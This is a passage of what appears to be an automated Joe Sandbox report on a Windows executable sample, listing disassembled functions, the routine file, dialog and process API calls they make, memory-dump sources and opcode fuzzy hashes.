TerminateProcess.KERNEL32(?,?,?,00007FF7E1DEBF48), ref: 00007FF7E1DEBF97
ExitProcess.KERNEL32 ref: 00007FF7E1DEBFA6

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 44b3a526fe0d15710854bc957cc7a82f9edee4cc7420f0560de4bec5ea2a17a0
Instruction ID: 5513b89db6aed866685b87aad4f7c9b74b45baa4db201a8db2caaa55523fcb59
Opcode Fuzzy Hash: 44b3a526fe0d15710854bc957cc7a82f9edee4cc7420f0560de4bec5ea2a17a0
Instruction Fuzzy Hash: 40E04815F0430546EB58FB715C9737993526F48742F50853AC80E4339ACDBEB5594723

Function 00007FF7E1DBF578 Relevance: 3.2, APIs: 2, Instructions: 193COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DBF895
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DBF89B

Part of subcall function 00007FF7E1DC3EC8: FindClose.KERNELBASE(?,?,00000000,00007FF7E1DD0811), ref: 00007FF7E1DC3EFD

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$CloseFind
String ID:
API String ID: 3587649625-0
Opcode ID: c851e9ba04b89524686dcd5c2666f728f32a2a2025563ce38f6b7d0a4701346e
Instruction ID: 623975f9ea95b7e01fdc48bed3325857627062f9f78150b07cec4c54bf5c1373
Opcode Fuzzy Hash: c851e9ba04b89524686dcd5c2666f728f32a2a2025563ce38f6b7d0a4701346e
Instruction Fuzzy Hash: 4191B073A18B91A0EB10EB24D4467EDA361FB84798FD04136EA4D07AE9DFBCD545C321

Function 00007FF7E1DB3904 Relevance: 3.1, APIs: 2, Instructions: 124COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DB3AB3
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DB3AB9

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 402f2d810e1efc6a759daaa5297bed4678b331cbcfb426b8061d29b6a9ebee63
Instruction ID: a6b83210f5b9ba3b86e16d53e8cc879052852e5be7e66150f36a63a4a86175c6
Opcode Fuzzy Hash: 402f2d810e1efc6a759daaa5297bed4678b331cbcfb426b8061d29b6a9ebee63
Instruction Fuzzy Hash: F141C422F14651A5FB00EBB5D442BBDA320EF44BD8F945236DE1E27AD9DEB8D482C311

Function 00007FF7E1DC2778 Relevance: 3.1, APIs: 2, Instructions: 100COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000002,?,00000F99,?,00007FF7E1DC274D), ref: 00007FF7E1DC28A9
GetLastError.KERNEL32(?,00007FF7E1DC274D), ref: 00007FF7E1DC28B8

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 043a82e8aff847b2e282b78885e55c7214a93c585b530bdf19c19deffc600893
Instruction ID: 0011f2586dfba0939bfc5a1b26885d8c7150dd6aa2a82aee8fe3168b2de08131
Opcode Fuzzy Hash: 043a82e8aff847b2e282b78885e55c7214a93c585b530bdf19c19deffc600893
Instruction Fuzzy Hash: EF311A22B1995242EF60EB26D542776A350AF84FD4F840533EE1C07794DFBCE581C3A2

Function 00007FF7E1DB22BC Relevance: 3.1, APIs: 2, Instructions: 83COMMON

Download Yara Rule

APIs

GetDlgItem.USER32 ref: 00007FF7E1DB22F1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DB23F0

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: Item_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1746051919-0
Opcode ID: 8763c555b957396376e96df864685bb2527d49eefc22d4d720e740779d29c564
Instruction ID: 1f2839a6da272e3e304b02ef559e33ea51a772442b1ab349b278acab60afa07f
Opcode Fuzzy Hash: 8763c555b957396376e96df864685bb2527d49eefc22d4d720e740779d29c564
Instruction Fuzzy Hash: 9731CF22A1974592EB14EB25F4867AAF360EB84B90F804236EA9D07B95DFBCF540C711

Function 00007FF7E1DC2AD0 Relevance: 3.1, APIs: 2, Instructions: 76timeCOMMON

Download Yara Rule

APIs

FlushFileBuffers.KERNEL32 ref: 00007FF7E1DC2AFE
SetFileTime.KERNELBASE ref: 00007FF7E1DC2B9B

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: File$BuffersFlushTime
String ID:
API String ID: 1392018926-0
Opcode ID: 1f7bfd0f82637a6abdcd08aef8b442a865f6f50d97ba3a1fa7ef62b0e093425a
Instruction ID: 81506f770b66cf40f70621d6eb55eee9962957827208a8c6aa7e3396f6d69b56
Opcode Fuzzy Hash: 1f7bfd0f82637a6abdcd08aef8b442a865f6f50d97ba3a1fa7ef62b0e093425a
Instruction Fuzzy Hash: 0721F462F0DB4351EB62EE11D4027BAD791AF81794F944832DE4C02299EEBCD586C352

Function 00007FF7E1DCAAE0 Relevance: 3.1, APIs: 2, Instructions: 52COMMON

Download Yara Rule

APIs

LoadStringW.USER32 ref: 00007FF7E1DCAB67
LoadStringW.USER32 ref: 00007FF7E1DCAB80

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: LoadString
String ID:
API String ID: 2948472770-0
Opcode ID: efc1550bd5bba1d5ac9face2304fa075ed5e4cb94ffc19493764f318ca00d951
Instruction ID: c840e9da85db6e83217b9100ba762d3051e65c6513576c814d2036bc31a89906
Opcode Fuzzy Hash: efc1550bd5bba1d5ac9face2304fa075ed5e4cb94ffc19493764f318ca00d951
Instruction Fuzzy Hash: 541181B1B0870185EB00EF16E8412A9F7A1BB94FC1B954976EA4D93720EFBCE541C395

Function 00007FF7E1DC2BB0 Relevance: 3.0, APIs: 2, Instructions: 47COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE ref: 00007FF7E1DC2C11
GetLastError.KERNEL32 ref: 00007FF7E1DC2C1E

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 5eda2cbf1ce6837a88d649c872729f31e823bc49095d59e5e9b193bf7b9166cd
Instruction ID: 2a17f7c09dd8bd0472bc3312ce01454a34ebe05d8bbd69847dc1ad557a44152b
Opcode Fuzzy Hash: 5eda2cbf1ce6837a88d649c872729f31e823bc49095d59e5e9b193bf7b9166cd
Instruction Fuzzy Hash: D611A531A0864181EB50EB25E982379A260FB847B4F944733DA7D062D4CFBCD592C352

Function 00007FF7E1DB255C Relevance: 3.0, APIs: 2, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7E1DCA4AC: swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7E1DCA504
Part of subcall function 00007FF7E1DCA4AC: SetDlgItemTextW.USER32 ref: 00007FF7E1DCA573
Part of subcall function 00007FF7E1DCA4AC: GetWindowRect.USER32 ref: 00007FF7E1DCA5AD
Part of subcall function 00007FF7E1DCA4AC: GetClientRect.USER32 ref: 00007FF7E1DCA5BB

GetDlgItem.USER32 ref: 00007FF7E1DB25AC
SetDlgItemTextW.USER32 ref: 00007FF7E1DB25C8

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: Item$RectText$ClientWindowswprintf
String ID:
API String ID: 402765569-0
Opcode ID: ad94589889145b650e3461eb84003e845283bd92425fc2a9221c8100a4e27e71
Instruction ID: 46331b31523b728cff2e43bb7823b1adfeee800c64201355583045aafa4ff6eb
Opcode Fuzzy Hash: ad94589889145b650e3461eb84003e845283bd92425fc2a9221c8100a4e27e71
Instruction Fuzzy Hash: FB015221B0D28A51FF59F752A466BB9D3915F85B84F880076E84F06699DEFCF884C322

Function 00007FF7E1DCEB58 Relevance: 3.0, APIs: 2, Instructions: 23COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7E1DCEBAD,?,?,?,?,00007FF7E1DC5752,?,?,?,00007FF7E1DC56DE), ref: 00007FF7E1DCEB5C
GetProcessAffinityMask.KERNEL32 ref: 00007FF7E1DCEB6F

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: 444071b75e142e51b736d9fa504759652bc9944b894df1f8101a797a07211085
Instruction ID: d50fd6e9cd76da92a1678d063b4fcec46cdedbe7dae7c1ed60ea634731c2f866
Opcode Fuzzy Hash: 444071b75e142e51b736d9fa504759652bc9944b894df1f8101a797a07211085
Instruction Fuzzy Hash: 60E02B61F1454642DF18DF55C4426E9F3A2BFC8B40BC48137D60B83618DE3CE2558B11

Function 00007FF7E1DE21D0 Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7E1DE2200

Part of subcall function 00007FF7E1DE2F7C: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7E1DE2F85

Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7E1DE2206

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
String ID:
API String ID: 1173176844-0
Opcode ID: ac554a43d54612151bc7e480101717375080be3004ee5b366f50feb51e7139dd
Instruction ID: 990a80abfa05470a498815ed72c3ac677d054ae181652b568454eba36bc28062
Opcode Fuzzy Hash: ac554a43d54612151bc7e480101717375080be3004ee5b366f50feb51e7139dd
Instruction Fuzzy Hash: 27E0EC45E1910741FF2CF26218673B482400F69372EDC9732DA3E846C2ADBCE5918132

Function 00007FF7E1DED90C Relevance: 3.0, APIs: 2, Instructions: 19threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlRestoreThreadPreferredUILanguages.NTDLL ref: 00007FF7E1DED922
GetLastError.KERNEL32 ref: 00007FF7E1DED934

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: ErrorLanguagesLastPreferredRestoreThread
String ID:
API String ID: 588628887-0
Opcode ID: 7829e02dcbd74b51c5e196648e5aad52518f68633834b7095f7e5950a32ae739
Instruction ID: 8c51252bcb54161403f0f70658400a87b9da129f26179061249e3f4613b790d7
Opcode Fuzzy Hash: 7829e02dcbd74b51c5e196648e5aad52518f68633834b7095f7e5950a32ae739
Instruction Fuzzy Hash: A5E08650F0990346FF0CFBB25C4737893915F98752B889036C90DC6252DEBCA5D18623

Function 00007FF7E1DB33E4 Relevance: 1.8, APIs: 1, Instructions: 328COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DB388C

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: db0f75601c8d953953658c1d14be6529ec917dbd1ad2d5887d518296e9f1c024
Instruction ID: 743256e12cc52867bb358f7b5e7c182dcea3d737e41468bdf26bdb28625fdc23
Opcode Fuzzy Hash: db0f75601c8d953953658c1d14be6529ec917dbd1ad2d5887d518296e9f1c024
Instruction Fuzzy Hash: 08D1B566B0868172EF28EB2595457B8E7A1FB05B84F840037CB5E077A5CF7CF4609322

Function 00007FF7E1DC5294 Relevance: 1.7, APIs: 1, Instructions: 198COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DC551B

Part of subcall function 00007FF7E1DD13F4: CompareStringW.KERNEL32 ref: 00007FF7E1DD145A

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: CompareString_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1017591355-0
Opcode ID: fa91c3799828e3c7186940546e344b2356dc381c1e63a9425ea543ecc2eeea66
Instruction ID: bbb7da2f5f189732a54870b8248fa034e4b22753235e9f7663dc83d968b9b8d8
Opcode Fuzzy Hash: fa91c3799828e3c7186940546e344b2356dc381c1e63a9425ea543ecc2eeea66
Instruction Fuzzy Hash: 7261CF91F0C64781EB64FA25841737AD291AF41BD4F944A33EE4D46AC6EEFCE441C2B2

Function 00007FF7E1DD1870 Relevance: 1.7, APIs: 1, Instructions: 172COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7E1DCE948: ReleaseSemaphore.KERNEL32 ref: 00007FF7E1DCE974
Part of subcall function 00007FF7E1DCE948: FindCloseChangeNotification.KERNELBASE ref: 00007FF7E1DCE993
Part of subcall function 00007FF7E1DCE948: DeleteCriticalSection.KERNEL32 ref: 00007FF7E1DCE9AA
Part of subcall function 00007FF7E1DCE948: CloseHandle.KERNEL32 ref: 00007FF7E1DCE9B7

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DD1ACB

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: Close$ChangeCriticalDeleteFindHandleNotificationReleaseSectionSemaphore_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1624603282-0
Opcode ID: f81b05313dfd5b5a73717daa6d384c08c9459244a7d30a6ec5ae517113eafb45
Instruction ID: 4234df2b0ad66a137bd3821ab9cf20a46e8360769b5d602ea3d26a87b43d4904
Opcode Fuzzy Hash: f81b05313dfd5b5a73717daa6d384c08c9459244a7d30a6ec5ae517113eafb45
Instruction Fuzzy Hash: 6B61B062B15685A2EF08EB65D5962BDB365FB40B90B944233D72D07AC1CFB8E4718311

Function 00007FF7E1DBEC9C Relevance: 1.6, APIs: 1, Instructions: 145COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DBEEB8

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: d7b1a399856acf99fdb305a598bd345408e38bb8b7611d952776f17d246575aa
Instruction ID: 3efeca1471cbf7db4169cfae013dbefc2495d26f8a33b9a6ddc49453391f9770
Opcode Fuzzy Hash: d7b1a399856acf99fdb305a598bd345408e38bb8b7611d952776f17d246575aa
Instruction Fuzzy Hash: C451D162A08682A0EB14FB2694467A9A751FB85BC4FC40137EE4E07392CFBDE485C361

Function 00007FF7E1DBE7A8 Relevance: 1.6, APIs: 1, Instructions: 118COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7E1DC3EC8: FindClose.KERNELBASE(?,?,00000000,00007FF7E1DD0811), ref: 00007FF7E1DC3EFD

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DBE993

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

